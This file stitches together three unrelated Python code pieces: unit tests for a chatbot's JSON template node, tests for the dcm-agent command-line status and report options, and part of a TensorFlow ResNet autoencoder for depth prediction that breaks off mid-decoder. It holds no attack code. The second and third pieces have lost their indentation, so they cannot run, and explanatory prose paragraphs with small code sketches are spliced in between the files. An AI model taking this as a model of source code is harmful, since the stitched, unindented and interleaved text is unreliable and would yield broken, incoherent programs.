        self.assertEqual('{"key_name": ["list_1", "list_3"]}', conversation.property("name_json"))

    def test_json_delete_dic_element(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("key_name")
        node._index = TemplateWordNode("1")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_property("name_json", '{"key_name": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": {"dic_1": "val_1", "dic_3": "val_3"}}', conversation.property("name_json"))

    def test_json_delete_index(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("key_name")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
        node._index = TemplateWordNode("0")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_2", "list_3"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("-1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_2"]}', conversation.property("name_json"))

    def test_json_delete_no_target(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("key_name")
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)

    def test_json_delete_invalid_key(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._function = TemplateWordNode("delete")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
        node._key = TemplateWordNode("key_x")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
        node._key = TemplateWordNode("key_name.key_x")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))

    def test_json_delete_invalid_child_key(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json.child1")
        node._type = "name"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("child2")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_property("name_json", '{"key_name": {"child1": "data"}}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": {"child1": "data"}}', conversation.property("name_json"))

    def test_json_delete_invalid_index(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("key_name")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
        node._index = TemplateWordNode("x")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("5")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("-5")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
    # to XML
    def test_to_xml_json_typename(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_1")
        root.append(node)
        xml = root.xml_tree(self._client_context)
        self.assertIsNotNone(xml)
        xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
        self.assertEqual('<template><json name="name_json"><key>key_1</key></json></template>', xml_str)

    def test_to_xml_json_typedata(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_1")
        root.append(node)
        xml = root.xml_tree(self._client_context)
        self.assertIsNotNone(xml)
        xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
        self.assertEqual('<template><json data="data_json"><key>key_1</key></json></template>', xml_str)

    def test_to_xml_json_typevar(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._key = TemplateWordNode("key_1")
        root.append(node)
        xml = root.xml_tree(self._client_context)
        self.assertIsNotNone(xml)
        xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
        self.assertEqual('<template><json var="var_json"><key>key_1</key></json></template>', xml_str)

    def test_to_xml_json_all_parameter(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("0")
        node._item = TemplateWordNode("key")
        node._key = TemplateWordNode("key_1")
        root.append(node)
        xml = root.xml_tree(self._client_context)
        self.assertIsNotNone(xml)
        xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
        self.assertEqual('<template><json var="var_json"><function>insert</function><index>0</index><item>key</item><key>key_1</key></json></template>', xml_str)

    def test_to_xml_json_no_key(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json.key_1")
        node._type = "var"
        node._function = TemplateWordNode("delete")
        node._index = TemplateWordNode("0")
        root.append(node)
        xml = root.xml_tree(self._client_context)
        self.assertIsNotNone(xml)
        xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
        self.assertEqual('<template><json var="var_json.key_1"><function>delete</function><index>0</index></json></template>', xml_str)
    # others
    def test_json_get_key_in_name(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json.key_1")
        node._type = "name"
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        self.assertIsNotNone(conversation.current_question())
        conversation.set_property("name_json", '{"key_1": "value_name"}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("value_name", result)

    def test_json_get_no_typename(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        self._client_context.brain.properties.add_property("default-get", "unknown")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)

    def test_json_get_no_typedata(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        self._client_context.brain.properties.add_property("default-get", "unknown")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)

    def test_json_get_no_typevar(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        self._client_context.brain.properties.add_property("default-get", "unknown")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)

    def test_json_invalid_function(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("update")
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)

    def test_json_invalid_insert(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)

    def test_json_invalid_type(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("other_json")
        node._type = "other"
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)

    def test_node_exception_handling(self):
        root = TemplateNode()
        node = MockTemplateJsonNode()
        root.append(node)
        with self.assertRaises(Exception):
            root.resolve(self._client_context)
# Copyright (C) 2014 Dell, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from distutils.log import warn
import getpass
import json
import os
import shutil
import tempfile
import unittest
import mock
import psutil
from dcm.agent import logger
import dcm.agent.cmd.service as dcmagent
import dcm.agent.cmd.configure as configure
import dcm.agent.tests.utils.general as test_utils
class TestProgramOptions(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.run_as_user = getpass.getuser()
test_utils.connect_to_debugger()
cls.test_base_path = tempfile.mkdtemp()
cls.test_conf_path = os.path.join(
cls.test_base_path, "etc", "agent.conf")
conf_args = ["-c", "Other",
"-u", "http://doesntmatter.org/ws",
"-p", cls.test_base_path,
"-t", os.path.join(cls.test_base_path, "tmp"),
"-C", "ws",
"-U", cls.run_as_user,
"-l", "/tmp/agent_status_test.log"]
rc = configure.main(conf_args)
if rc != 0:
raise Exception("We could not configure the test env")
@classmethod
def tearDownClass(cls):
logger.clear_dcm_logging()
shutil.rmtree(cls.test_base_path)
def tearDown(self):
if os.path.exists("/tmp/agent_info.tar.gz"):
os.remove("/tmp/agent_info.tar.gz")
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.utils.identify_platform')
def test_simple_status(self, id_platform, sql_obj):
id_platform.return_value = ("ubuntu", "14.04")
rc = dcmagent.main(args=["dcm-agent", "status"])
print(rc)
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.utils.identify_platform')
def test_simple_tar(self, id_platform):
id_platform.return_value = ("ubuntu", "14.04")
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "--report"])
self.assertEqual(rc, 0)
self.assertTrue(os.path.exists("/tmp/agent_info.tar.gz"))
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_effective_cloud_base_report(self,
id_platform,
guess_effective_cloud_mock):
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "--report"])
self.assertEqual(rc, 0)
self.assertTrue(os.path.exists("/tmp/agent_info.tar.gz"))
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_real_pid_status(self, id_platform, guess_effective_cloud_mock):
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
pid_file = os.path.join(self.test_base_path, "dcm-agent.pid")
with open(pid_file, "w") as fptr:
fptr.write(str(os.getpid()))
try:
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 0)
finally:
os.remove(pid_file)
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_bad_pid_status(self, id_platform, guess_effective_cloud_mock):
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
pid_file = os.path.join(self.test_base_path, "dcm-agent.pid")
with open(pid_file, "w") as fptr:
fptr.write("notapid")
try:
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
finally:
os.remove(pid_file)
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_used_pid_status(self, id_platform, guess_effective_cloud_mock):
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
pid_file = os.path.join(self.test_base_path, "dcm-agent.pid")
pid_val = None
pid_list = psutil.pids()
for i in range(10, 2 ** 15):  # 2 ** 15 == 32768; the original '2 ^ 15' is XOR and equals 13
if i not in pid_list:
pid_val = i
break
if pid_val is None:
warn("No free pid found... huh")
raise unittest.SkipTest("No free pid found")
with open(pid_file, "w") as fptr:
fptr.write(str(pid_val))
try:
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
finally:
os.remove(pid_file)
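The scan above walks `psutil.pids()` looking for a PID no process owns (the upper bound is intended as `2 ** 15`, not the XOR `2 ^ 15`). A stdlib-only sketch of the same idea, using `os.kill(pid, 0)` as an existence probe; `find_free_pid` is a hypothetical helper name, not part of the test suite:

```python
import os

def find_free_pid(start=10, stop=2 ** 15):
    """Return a PID in [start, stop) owned by no running process, or None.

    os.kill(pid, 0) sends no signal; it raises ProcessLookupError when
    the PID is unused, and PermissionError when it exists but belongs
    to another user.
    """
    for pid in range(start, stop):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            return pid  # nobody owns this PID right now
        except PermissionError:
            continue  # PID is in use by another user's process
    return None

free = find_free_pid()
print("candidate unused pid:", free)
```

Like the psutil version, this is racy by nature: a PID that was free when probed can be reused an instant later, which is acceptable for a test fixture.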
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return [FakeRequest({'command': 'initialize'})]
def get_all_reply(self):
return []
def get_all_rejected(self):
return []
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_exception_in_request_lookup(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return [FakeRequest({'nocommand': 'initialize'})]
def get_all_reply(self):
return []
def get_all_rejected(self):
return []
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup_not_initialized(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return []
def get_all_reply(self):
return [FakeRequest({'command': 'initialize'})]
def get_all_rejected(self):
return []
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup_rejected_initialized(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return []
def get_all_reply(self):
return []
def get_all_rejected(self):
return [FakeRequest({'command': 'initialize'})]
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup_acked_initialized(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return []
def get_all_reply(self):
return []
def get_all_rejected(self):
return []
def get_all_ack(self):
return [FakeRequest({'command': 'initialize'})]
def get_all_reply_nacked(self):
return []
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
@mock.patch('dcm.agent.messaging.persistence.SQLiteAgentDB')
@mock.patch('dcm.agent.cloudmetadata.guess_effective_cloud')
@mock.patch('dcm.agent.utils.identify_platform')
def test_status_db_jobs_request_lookup_nacked_initialized(
self, id_platform, guess_effective_cloud_mock, fake_db):
class FakeRequest(object):
def __init__(self, doc):
self.request_doc = json.dumps({'payload': doc})
class FakeDB(object):
def get_all_complete(self):
return []
def get_all_reply(self):
return []
def get_all_rejected(self):
return []
def get_all_ack(self):
return []
def get_all_reply_nacked(self):
return [FakeRequest({'command': 'initialize'})]
fake_db.return_value = FakeDB()
id_platform.return_value = ("ubuntu", "14.04")
guess_effective_cloud_mock.return_value = "Other"
rc = dcmagent.main(
args=["dcm-agent", "-c", self.test_conf_path, "status"])
self.assertEqual(rc, 1)
# depth_network/depth_prediction_net.py
# from GeoffreyMClark/Depth_Estimation (MIT license)
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import matplotlib.pyplot as plt
import tensorflow as tf
import logging
tf.get_logger().setLevel(logging.ERROR)
import time
import cv2
import numpy as np
import pickle
from sklearn.model_selection import train_test_split
import math
from tensorflow.keras.initializers import glorot_uniform
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dropout, Flatten, Dense, Conv2D, MaxPooling2D, Input, Activation, Add
from tensorflow.keras.layers import Reshape, UpSampling2D, InputLayer, Lambda, ZeroPadding2D, AveragePooling2D
from tensorflow.keras.layers import Cropping2D, Conv2DTranspose, BatchNormalization, Concatenate
from tensorflow.keras import backend as K
from tensorflow.keras.losses import mse, binary_crossentropy
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.utils import plot_model
from tensorflow.keras.applications.resnet50 import ResNet50
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.resnet50 import preprocess_input, decode_predictions
from tensorflow.keras.applications import EfficientNetB0
class get_depth_net():
# @staticmethod
def identity_block(self, X, f, filters, stage, block):
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value. We'll need this later to add back to the main path.
X_shortcut = X
# First component of main path
X = Conv2D(filters=F1, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2a', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2a')(X)
X = Activation('relu')(X)
# Second component of main path
X = Conv2D(filters=F2, kernel_size=(f, f), strides=(1, 1), padding='same',
name=conv_name_base + '2b', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path
X = Conv2D(filters=F3, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2c', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2c')(X)
# Final step: Add shortcut value to main path, and pass it through a RELU activation
X = Add()([X, X_shortcut])
out_shortcut = X
X = Activation('relu')(X)
return X, out_shortcut
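The block above returns both the activated output and the pre-activation sum so later stages can reuse the shortcut. The core invariant is that the transform must preserve shape so the input can be added back before the ReLU. A minimal NumPy sketch of that residual-shortcut idea (hypothetical helper names, standing in for the three Conv+BN layers):

```python
import numpy as np

def relu(x):
    return np.maximum(x, 0.0)

def residual_identity(x, transform):
    """Toy residual block: apply a shape-preserving transform, add the
    input back via the shortcut, then ReLU -- mirroring
    Add()([X, X_shortcut]) followed by Activation('relu') above."""
    main = transform(x)  # stand-in for the Conv -> BN -> ReLU stack
    assert main.shape == x.shape, "identity shortcut needs matching shapes"
    pre_activation = main + x   # Add()([X, X_shortcut])
    return relu(pre_activation), pre_activation  # (X, out_shortcut)

x = np.array([[1.0, -2.0], [3.0, -4.0]])
out, shortcut = residual_identity(x, lambda t: -0.5 * t)
print(out)  # relu(x - 0.5 * x) == relu(0.5 * x)
```

Because the shortcut carries `x` through unchanged, the block can learn a near-identity mapping even when the convolutional path contributes little, which is what makes deep ResNet stacks trainable.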
def identity_block_transpose(self, X, f, filters, stage, block):
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value. We'll need this later to add back to the main path.
X_shortcut = X
# First component of main path
X = Conv2DTranspose(filters=F1, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2a', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2a')(X)
X = Activation('relu')(X)
# Second component of main path
X = Conv2DTranspose(filters=F2, kernel_size=(f, f), strides=(1, 1), padding='same',
name=conv_name_base + '2b', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path
X = Conv2DTranspose(filters=F3, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2c', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2c')(X)
# Final step: Add shortcut value to main path, and pass it through a RELU activation
X = Add()([X, X_shortcut])
out_shortcut = X
X = Activation('relu')(X)
return X, out_shortcut
def convolutional_block(self, X, f, filters, stage, block, s=2):
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value
X_shortcut = X
##### MAIN PATH #####
# First component of main path
X = Conv2D(F1, (1, 1), strides=(s, s), name=conv_name_base +
'2a', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2a')(X)
X = Activation('relu')(X)
# Second component of main path
X = Conv2D(filters=F2, kernel_size=(f, f), strides=(1, 1), padding='same',
name=conv_name_base + '2b', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path
X = Conv2D(filters=F3, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2c', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2c')(X)
##### SHORTCUT PATH ####
X_shortcut = Conv2D(F3, (1, 1), strides=(s, s), name=conv_name_base +
'1', kernel_initializer=glorot_uniform(seed=0))(X_shortcut)
X_shortcut = BatchNormalization(
axis=3, name=bn_name_base + '1')(X_shortcut)
# Final step: Add shortcut value to main path, and pass it through a RELU activation
X = Add()([X, X_shortcut])
out_shortcut = X
X = Activation('relu')(X)
return X, out_shortcut
def convolutional_block_transpose(self, X, f, filters, stage, block, s=2):
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value
X_shortcut = X
##### MAIN PATH #####
# First component of main path
X = Conv2DTranspose(F1, (1, 1), strides=(s, s), name=conv_name_base +
'2a', padding='valid', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2a')(X)
X = Activation('relu')(X)
# Second component of main path
X = Conv2DTranspose(filters=F2, kernel_size=(f, f), strides=(1, 1), padding='same',
name=conv_name_base + '2b', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path
X = Conv2DTranspose(filters=F3, kernel_size=(1, 1), strides=(1, 1), padding='valid',
name=conv_name_base + '2c', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name=bn_name_base + '2c')(X)
##### SHORTCUT PATH ####
X_shortcut = Conv2DTranspose(F3, (1, 1), strides=(s, s), name=conv_name_base +
'1', padding='valid', kernel_initializer=glorot_uniform(seed=0))(X_shortcut)
X_shortcut = BatchNormalization(
axis=3, name=bn_name_base + '1')(X_shortcut)
# Final step: Add shortcut value to main path, and pass it through a RELU activation
X = Add()([X, X_shortcut])
out_shortcut = X
X = Activation('relu')(X)
return X, out_shortcut
def ResNet_autoencoder(self, height, width, depth, latentDim=64):
X_input = Input(shape=(height, width, depth))
X = X_input
# encoder Stage 1
X = Conv2D(32, (3, 3), strides=(2, 2), name='conv1-1',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv1-1')(X)
X = Activation('relu')(X)
X = Conv2D(32, (1, 1), strides=(1, 1), name='conv1-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv1-2')(X)
skip_connect_1 = X
X = Activation('relu')(X)
# encoder Stage 2
X = Conv2D(64, (3, 3), strides=(2, 2), name='conv2-1',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv2-1')(X)
X = Activation('relu')(X)
X = Conv2D(64, (1, 1), strides=(1, 1), name='conv2-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv2-2')(X)
skip_connect_2 = X
X = Activation('relu')(X)
# encoder Stage 3
X, _ = self.convolutional_block(
X, f=3, filters=[64, 64, 128], stage=3, block='a', s=2)
X, skip_connect_3 = self.identity_block(
X, 3, [64, 64, 128], stage=3, block='b')
# encoder Stage 4
X, _ = self.convolutional_block(
X, f=3, filters=[128, 128, 256], stage=4, block='a', s=2)
X, skip_connect_4 = self.identity_block(
X, 3, [128, 128, 256], stage=4, block='b')
# encoder Stage 5
X, _ = self.convolutional_block(
X, f=3, filters=[256, 256, 512], stage=5, block='a', s=2)
X, skip_connect_5 = self.identity_block(
X, 3, [256, 256, 512], stage=5, block='b')
# latent-space representation
volumeSize = K.int_shape(X)
X = Flatten()(X)
latent = Dense(latentDim)(X)
# encoder = Model(X_input, latent, name="encoder")
# latentInputs = Input(shape=(latentDim,))
X = Dense(np.prod(volumeSize[1:]))(latent)
X = Reshape((volumeSize[1], volumeSize[2], volumeSize[3]))(X)
# # # decoder Stage 1
X = Concatenate()([X, skip_connect_5])
X, _ = self.identity_block_transpose(
X, 3, [1024, 1024, 1024], stage=6, block='b')
X = Conv2DTranspose(512, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[512, 256, 256], stage=6, block='a', s=2)
# # # decoder Stage 2
X = Concatenate()([X, skip_connect_4])
X, _ = self.identity_block_transpose(
X, 3, [512, 512, 512], stage=7, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[256, 128, 128], stage=7, block='a', s=2)
# X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 3
X = Concatenate()([X, skip_connect_3])
X, _ = self.identity_block_transpose(
X, 3, [256, 256, 256], stage=8, block='b')
